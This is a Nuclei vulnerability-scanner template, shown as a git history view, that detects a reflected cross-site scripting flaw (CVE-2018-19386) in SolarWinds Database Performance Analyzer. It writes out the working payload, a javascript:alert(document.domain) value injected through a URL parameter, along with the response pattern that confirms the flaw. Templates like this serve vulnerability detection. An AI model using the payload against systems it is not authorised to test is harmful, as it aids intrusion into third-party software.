nuclei-templates/cves/CVE-2018-19386.yaml

22 lines
522 B
YAML
Raw Normal View History

id: cve-2018-19386
2020-09-09 01:45:42 +00:00
info:
name: SolarWinds Database Performance Analyzer 11.1. 457 - Cross Site Scripting
author: pikpikcu
severity: medium
# Refrence:-https://www.cvedetails.com/cve/CVE-2018-19386/
requests:
- method: GET
path:
2020-10-15 18:50:10 +00:00
- "{{BaseURL}}/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f"
2020-09-09 01:45:42 +00:00
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
2020-10-15 18:50:10 +00:00
- '<a href="javascript:alert(document.domain)//'